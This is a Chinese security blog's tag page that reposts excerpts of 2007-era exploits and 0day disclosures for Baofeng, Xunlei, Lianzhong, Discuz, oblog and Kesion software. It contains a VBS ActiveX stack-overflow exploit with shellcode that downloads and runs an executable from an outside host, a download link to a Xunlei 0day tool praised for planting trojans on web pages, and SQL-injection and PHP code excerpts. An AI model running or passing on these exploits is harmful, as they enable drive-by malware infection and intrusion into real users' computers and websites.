标签 ‘漏洞’ 下的日志

暴风影音3.7.11.13 爆远程拒绝服务漏洞

传说中的《暴风影音3》新版本爆漏洞,这次很夸张,远程拒绝服务.
起因是暴风影音自动更新程序会在远程监听一个端口,如果向其发送畸形数据包,就会导致自动更新程序崩溃;如果对其发送精心构造过的数据包,则足以导致用户主机在不知情的情况下被完全控制.
以下是帖子全文:

CISVul20071128

暴风影音3.7.11.13 DOS Vul

|=—————-[ 暴风影音3.7.11.13 DOS Vulnerabilities ]——-=|
|=—————————————————————–=|
|=—————=[ 阅读全文 »

Tags: ,

迅雷5 0day 利用工具

来源:酒水不犯茶水

迅雷官方最新版本迅雷(Thunder5.7.4.401)依然受此漏洞影响
挂马相当好用,只是如果用iframe,宽高不能为0
(pplayer.dll 组件版本号:1.2.3.49,CLSID:F3E70CEA-956E-49CC-B444-73AFE593AD7F)

http://www.blogjava.net/Files/baicker/xunleikankan.rar

Tags: , ,

联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞(exp)

鬼仔注:又见联众

来源:vbs空间

exeurl = InputBox( "请输入下载执行exe的地址:", "输入","http://np.icehack.com/np.exe" )
'code by NetPatch
if exeurl <> "" then
code="\xe9\xf3\x00\x00\x00\x90\x90\x90\x90\x5a\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x8b\xd8\x8b\x73\x3c\x8b\x74\x1e\x78\x03\xf3\x8 阅读全文 »

Tags: , , ,

Discuz! 6.0.0 0Day漏洞

loveshell:哎 下次仔细看下代码再发!Just a joke…
鬼仔注:未测试。

来源:坏狼安全网

// 允许程序在 register_globals = off 的环境下工作
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');

if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}

$self = $_SERVER['PHP_SELF'];
$dis_func = get_cfg_var("disable_functions");
阅读全文 »

Tags: , , , ,

PHP Security-Shell RFI Scanner

鬼仔注:代码放到txt里了。

来源:cnfjhh

本地RFI检测文件工具,可以方便的查找有问题的文件,快速挖掘php远程包含漏洞的利器。
eg:
PHP scanner.php secow

scanner.php and secow 要和PHP环境放在一起,其中secow指的所要检测的php程序文件夹

scanner.php的完整代码如下:
article_1471_code.txt

Tags: , ,

惊爆oblog4.6 0day

此文章已发表在《黑客X档案》第11期杂志上
如需转载,请务必保留此信息!

作者:zj1244&竹子

自从上次oblog的tb.asp和js.asp文件出现漏洞后,直至今日oblog都没有爆出什么安全问题,前些日子官方发布了4.6稳定版,趁着无聊下下来看看代码的安全性,没想到还真的发现了一些问题。后来联系了oblog的客服,可是在qq上验证了几次人家也没有理我,没办法,那就只能发出来了。

我们先来简单分析一下漏洞的成因:漏洞出现在user_diggs.asp文件第304行左右,用Request获得topic的值,然后用oblog.InterceptStr处理后赋给topic。oblog.InterceptStr的作用只是截断字符而已,并没有过滤特殊字符。接着往 阅读全文 »

Tags: , ,

网趣购物系统XP 3.2注入漏洞

Author:Tr4c3[dot]126[dot]CoM
http://www.nspcn.org
http://www.tr4c3.com
漏洞成因同:
http://www.tr4c3.com/post/220.html
网趣网上购物系统时尚版 v3.2注入漏洞

以官方为例演示:

阅读全文 »

Tags: , ,

风讯,科讯

来源:疯子

最近搞得火热。

风讯注入

这是一个简单注入。还有N(N大于17)个二次注入
科讯也有白痴漏洞

KS_Editor/InsertFunctionfield.asp

ID = Trim(request("id"))
Call Main
Call CloseConn
Sub Main()
Set rs=Conn.Execute("select * from KS_Label where ID='" & ID & "'")

看到这种漏洞都有,不想再看下去。
是另外一个疯子看出来的。

下面是风讯的,最新的官方下的

Tags: